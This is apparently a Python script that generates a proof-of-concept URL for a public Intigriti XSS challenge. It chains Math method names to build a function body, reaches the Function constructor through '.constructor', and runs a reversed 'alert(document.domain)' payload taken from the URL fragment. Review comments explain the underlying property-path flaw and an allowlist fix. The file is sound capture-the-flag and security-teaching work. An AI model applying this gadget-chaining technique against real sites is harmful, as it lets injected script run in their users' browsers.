|
# Page of the public Intigriti challenge that this proof-of-concept generator targets.
BASE_URL = "https://challenge-0823.intigriti.io/challenge/index.html"

# Marker script placed (reversed) in the URL fragment by the final print() call.
# A dialog showing document.domain demonstrates in which origin the script ran.
XSS_PAYLOAD = "alert(document.domain)"
|
|
|
|
|
def make_zero() -> list[str]:
    """Return the three step names the author uses to produce the number 0.

    In JavaScript, Math.sign(Math.E) is 1 and Math.log(1) is 0.
    NOTE(review): this assumes the challenge page feeds each step's result
    into the next call; that evaluation loop is not part of this script.

    A new list is built on every call, so callers may extend it freely.
    """
    steps = ["Math.E.valueOf", "Math.sign"]
    steps.append("Math.log")
    return steps
|
|
|
|
|
def make_one() -> list[str]:
    """Return the two step names the author uses to produce the number 1.

    In JavaScript, Math.sign(Math.E) is 1.
    NOTE(review): this assumes the challenge page feeds each step's result
    into the next call; that evaluation loop is not part of this script.

    A new list is built on every call, so callers may extend it freely.
    """
    return list(("Math.E.valueOf", "Math.sign"))
|
|
|
|
|
def clear_seeds() -> list[str]:
    """Return the steps that empty the page's `Math.seeds` array.

    The zero-producing chain is followed by `Math.seeds.splice`; the author's
    trace in the main script records the resulting state as Math.seeds === [].
    """
    steps = make_zero()
    steps.append("Math.seeds.splice")
    return steps
|
|
|
|
|
# Maps one character to the step names that yield it.
#
# Letters: a 0 or 1 from make_zero()/make_one() is followed by
# `<function>.name.at`, i.e. the character at that index of a built-in
# function's name ("max".at(1) is "a", "min".at(0) is "m").
# Tab and newline: the length of a method name (9 for "normalize", 10 for
# "replaceAll") is passed to String.fromCharCode.
# NOTE(review): this relies on the page feeding each result into the next
# call; confirm against the challenge source.
char_to_list = {
    "a": make_one() + ["Math.max.name.at"],
    "c": make_one() + ["Math.acos.name.at"],
    "d": make_zero() + ["Math.constructor.defineProperty.name.at"],
    "e": make_one() + ["Math.ceil.name.at"],
    "g": make_zero() + ["Math.constructor.getPrototypeOf.name.at"],
    "h": make_zero() + ["Math.hypot.name.at"],
    "i": make_one() + ["Math.sin.name.at"],
    "l": make_one() + ["Math.floor.name.at"],
    "m": make_zero() + ["Math.min.name.at"],
    "n": make_one() + ["Math.constructor.entries.name.at"],
    "o": make_one() + ["Math.round.name.at"],
    "q": make_one() + ["Math.sqrt.name.at"],
    "r": make_one() + ["Math.trunc.name.at"],
    "s": make_zero() + ["Math.sin.name.at"],
    "t": make_one() + ["Math.atan.name.at"],
    "u": make_one() + ["Math.random.name.sub.name.at"],
    "v": make_zero() + ["Math.constructor.values.name.at"],
    "\t": [
        "Math.random.name.normalize.name.length.valueOf",
        "Math.random.name.constructor.fromCharCode",
    ],
    "\n": [
        "Math.random.name.replaceAll.name.length.valueOf",
        "Math.random.name.constructor.fromCharCode",
    ],
}
|
|
|
|
|
# Ordered step names that end up, comma-separated, in the `q` query parameter.
# The state comments below are the author's trace of the page's `Math.seeds`
# array and of the value returned by the preceding step.
#
# NOTE(review): the chain reaches the Function constructor through
# `Math.random.constructor`. As far as this script shows, the underlying flaw
# is that request-supplied names may walk arbitrary property paths, including
# `.constructor`. Resolving names against a fixed allowlist of Math methods
# would close that path.
qs = []

qs.extend(clear_seeds())
# Math.seeds === []

# Push the characters of a small function body one at a time.
func_body = "return\tlocation"
for c in func_body:
    qs.extend(char_to_list[c])
    qs.append("Math.seeds.push")
# Math.seeds === ["r", "e", "t", ..., "n"]

qs.extend(["Math.random.name.valueOf", "Math.seeds.join"])
# -> "return\tlocation"

qs.extend(["Math.random.constructor", "Math.seeds.reduce"])
# -> Function("return\tlocation")

qs.extend(
    [
        "Math.constructor.values",
        "Math.seeds.sort.apply",
        "Math.seeds.reverse.apply",
        "Math.seeds.join.bind",
        "Math.seeds.unshift",
    ]
)
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse()), "r", "e", "t", ..., "n"]

# Drop everything after the first element.
qs.extend(make_one())
qs.append("Math.seeds.splice")
# Math.seeds === [Math.seeds.join.bind(Object.values(location).sort().reverse())]

# Prepend two values; the author's trace shows both as empty strings.
qs.extend(["Math.random.name.valueOf", "Math.seeds.unshift"] * 2)
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse())]

qs.extend(["Math.seeds.pop", "Math.seeds.reduce"])
# -> Object.values(location).sort().reverse().join("", "")
# Math.seeds === ["", "", Math.seeds.join.bind(Object.values(location).sort().reverse())]

qs.extend(
    [
        "Math.seeds.constructor.from",
        "Math.seeds.reverse.apply",
        "Math.seeds.join.bind",
        "Math.seeds.reduce",
    ]
)
# -> "alert(document.domain)//#..."

qs.extend(["Math.random.constructor", "Math.seeds.reduce"])
# -> Function("alert(document.domain)//#...")("", "")

# presumably the challenge page caps the number of steps; confirm against its source
assert len(qs) < 100, len(qs)

# The fragment carries the payload plus "//" reversed; the chain above
# reverses it back before it reaches the Function constructor.
query = ",".join(qs)
fragment = (XSS_PAYLOAD + "//")[::-1]
print(f"{BASE_URL}?q={query}#{fragment}")
# Per the author: opening the printed URL executes `alert(document.domain)`.